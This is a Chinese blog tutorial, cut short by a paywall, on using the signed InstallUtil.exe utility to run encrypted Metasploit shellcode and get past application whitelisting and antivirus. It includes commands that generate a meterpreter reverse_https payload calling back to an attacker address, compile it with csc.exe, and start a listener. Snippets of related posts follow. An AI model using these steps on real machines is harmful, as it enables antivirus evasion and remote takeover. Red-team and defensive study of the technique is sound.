qt5 执行exe带参数_白名单InstallUtil.exe绕过火绒|腾讯管家|360杀毒等杀软

最新推荐文章于 2021-12-05 15:11:02 发布
最新推荐文章于 2021-12-05 15:11:02 发布
阅读量701 收藏
点赞数
文章标签: qt5 执行exe带参数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39787628/article/details/111582641
版权

0x00 简介

ATT&CK编号: T1118

战术: 防御逃避,执行

平台: Windows

所需权限: 用户

数据源: 进程监视,进程命令行参数

绕过防御: 进程白名单,数字证书验证

InstallUtil 是一个命令行实用程序,它允许通过执行。net 二进制文件中指定的特定安装程序组件来安装和卸载资源。[1] InstallUtil 位于 Windows 系统的。NET 目录中: C:WindowsMicrosoft.NETFrameworkvInstallUtil.exeC:WindowsMicrosoft.NETFramework64vInstallUtil.exe. InstallUtil.exe 具有 Microsoft 的数字签名。 攻击者可以通过受信的 Windows 实用程序使用 InstallUtil 来代理代码的执行。 通过利用执行由 [System.ComponentModel.RunInstaller(true)]。[2]修饰的类的二进制文件中的属性,InstallUtil 还可用于来绕过进程白名单。

0x01 环境

攻击机:Kali

受害机:Windows7

依赖环境:http://Microsoft.NET Framework v4.0.30319

0x02 利用过程

用的比较多的是CSC.exe+InstallUtil.exe加载shellcode,流程为:msf生成C#格式shellcode -> 加密shellcode -> 解密并加载shellcode -> csc.exe编译成.jpg文件 -> InstallUtil.exe白名单执行。

1. 常规用法

项目地址:https://github.com/khr0x40sh/WhiteListEvasion.git

生成cs文件

python InstallUtil.py --cs_file temp.cs --exe_name temp.exe --payload windows/meterpreter/reverse_https --lhost 192.168.1.11 --lport 443

csc.exe pentestlab.cs

7070712a17794656089e7d64114f850d.png

攻击机打开msf中使用windows/x64/meterpreter/reverse_tcp设置监听

最低0.47元/天 解锁文章
weixin_39787628
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
installutil 32位及64位
09-04
用于安装服务的工具,包含2.0和4.0版本,分为32位和64位,已经整理好,一共4个
Qt 之 打开exe程序
fedora的博客
10-27 9292
#include <QProcess> QProcess pro; QString strPath = "D:/test.exe"; pro.startDetached(strPath);
监控名单Installutil.exe执行payload行为
12306小哥
04-13 626
简介 命令行实用程序InstallUtil可用于通过执行.NET二进制文件中指定的特定安装程序组件来安装和卸载资源。 InstallUtil位于Windows系统上的.NET目录中: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe ...
payload免Installutil.exe&csc.exe利用
weixin_30883311的博客
09-30 844
0x00 前言 C#的在Windows平台下的编译器名称是Csc.exeInstallutil.exe工具是一个命令行实用程序,允许您通过执行指定程序集中的安装程序组件来安装和卸载服务器资源,可以执行dll,exe,txt等。这两个东西一般情况下是配合使用。所以就不单独拿出来讲了。 0x01 利用过程 1.下载shellcode.cs wget https://gi...
QProcess类 :(qt启动一个外部exe程序,exe程序,cmd命令)
心若十年的博客
12-02 7634
目录执行cmd命令启动一个外部exe程序示例启动一个参数exe程序示例 执行cmd命令 QProcess program; QString cmd = "shutdown -s -t 120"; program.start(cmd); program.waitForFinished(); 启动一个外部exe程序示例 QProcess program; QString cmd = "C:\\meetsystem\\MeetClient\\bin\\MeetClient2.exe"; program.st
第七十二课:基于名单Installutil.exe执行payload第二季1
最新发布
08-03
基于名单installutil.exe配置payload:配置攻击机msf:靶机执行:靶机编译:靶机执行:附录:Micropoor.cs注:x64 paylo
第七十二课:基于名单Installutil.exe执行payload第二季.docx
09-15
然而,如果攻击者能够利用名单中允许的工具(如Installutil.exe),他们可能能够绕过这种防护措施。 3. **Payload创建与部署**:攻击者在攻击机上(例如Debian系统)使用Metasploit框架(msf)生成恶意代码,并将...
installutil.exe
12-11
installutil.exe 下载,可用于service服务程序运行时提供服务。
InstallUtil.exe 免费下载
02-08
InstallUtil.exe 免费下载
第七十七课:基于名单Csc.exe执行payload第七季.docx
09-15
与之前的第七十二课相比,这种方法的payload更加隐蔽且灵活,因为它利用了系统名单进程Csc.exe,并通过编译库文件的方式绕过直接执行可疑代码的检测。这种技术使得攻击者能够更巧妙地规避安全件的检测,从而成功...
安装程序工具 (Installutil.exe)
weixin_30681615的博客
06-09 1704
网址:https://msdn.microsoft.com/zh-cn/library/50614e95(VS.80).aspx 安装程序工具 (Installutil.exe) .NET Framework 2.0 其他版本 安装程序工具使您得以通过在执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具...
09.QT应用程序启动外部exe文件
写给自己的笔记
01-21 3039
根据QT帮助文档,写了一个小测试案例,在QT应用中,启动 一个外部的exe程序,目前此exe使用的QT编译形成,后期改用C#形式的exe文件。 #include "QProcessDemo.h" #include <QPushButton> #include <QProcess> #include <QMessageBox> #i...
QT5程序生成.exe执行文件
叶卡捷琳堡的博客
03-03 396
传送门
Installutil.exe的位置和路径
weixin_53370274的博客
12-05 1089
转载 https://www.cnblogs.com/yuanli/p/3234027.html 安装程序工具使您得以通过在执行指定程序集中的安装程序组件来安装和卸载服务器资源。此工具与 System.Configuration.Install 命名空间中的类一起工作。 安转的位置和路径在: C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe 卸载的位置和路径在: C:\WINDOWS\Microsoft.NET\Framework\v
InstallUtil
06-15 183
C:\Windows\Microsoft.NET\Framework64\v4.0.30319 InstallUtil.exe D:\services\QueueService\QueueService.exe net start QueueService net stop QueueService InstallUtil.exe /u D:\services\QueueServ...
安装更新工具类 InstallUtil.md
bencheng06的博客
09-28 2613
安装更新工具的类 InstallUtil.java 跳转 Android 内部更新实践 完美解决各个版本 原文 package com.ztsc.house.utils; import android.app.Activity; import android.app.ActivityManager; import android.app.AlertDialog; import android.c...
Qt中启动外部程序
热门推荐
简介
06-11 1万+
Qt中启动外部程序 在Qt中启动外部程序较简单,上代码: QProcess process; process.start("notepad.exe"); 这样就启动了一个记事本程序。 这里增加点难度,只允许当前系统中运行一个记事本程序。 分两步: 判断当前是否运行记事本程序 不存在,启动记事本 看代码: QProcess process; process.start("...
对亮神基于名单 Csc.exe 执行 payload 第七季复现
cxk
05-03 513
待补充
打开外部EXE程序,并且出传递参数
萧海的博客
10-24 1092
1、采用Windows指令 //设置操作指令 std::wstring operate = QString("runas").toStdWString(); //设置EXE路径 std::wstring path = QCoreApplication::applicationDirPath().toStdWString(); //设置EXE std::wstring fileName = QString(QCoreApplication::applicationDirPath() + "/app.ex
远控免技术:名单策略详解(113个程序)
远控免是一种黑客技术,用于使恶意件在目标系统上执行时能够绕过安全防护措施,特别是那些基于名单策略的安全系统。名单是一种安全机制,仅允许预定义的一组程序或进程运行,而阻止所有未列入名单的程序。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值